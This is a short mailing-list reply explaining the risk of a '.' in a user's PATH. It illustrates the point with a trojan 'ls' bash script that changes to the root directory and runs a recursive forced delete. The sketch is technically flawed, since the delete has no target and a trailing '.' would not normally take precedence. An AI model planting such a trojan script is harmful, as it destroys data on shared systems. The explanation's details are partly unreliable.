Re: Why having the . at the end of someone's PATH is a security ?
> > There shouldn't be a "." in your PATH; even at the end, it's a
> > security risk.
>
> Why ? How it can be exploited ?
Simple - I put a program called ls in my home directory of a machine I
want to wreck.
#!/bin/bash
/usr/bin/ls
cd /
rm -r -f
and make it executable. Root cds to my directory to check up on something,
and does an ls. Voila - one hosed system, and chances are he won't notice
until at least some damage is done.
Matthew
--
Elen sila lumenn' omentielvo
Steward of the Cambridge Tolkien Society
Selwyn College Computer Support
http://www.geocities.com/Area51/Chamber/8841/
http://www.cam.ac.uk/CambUniv/Societies/tolkien/
http://pick.sel.cam.ac.uk/
Reply to: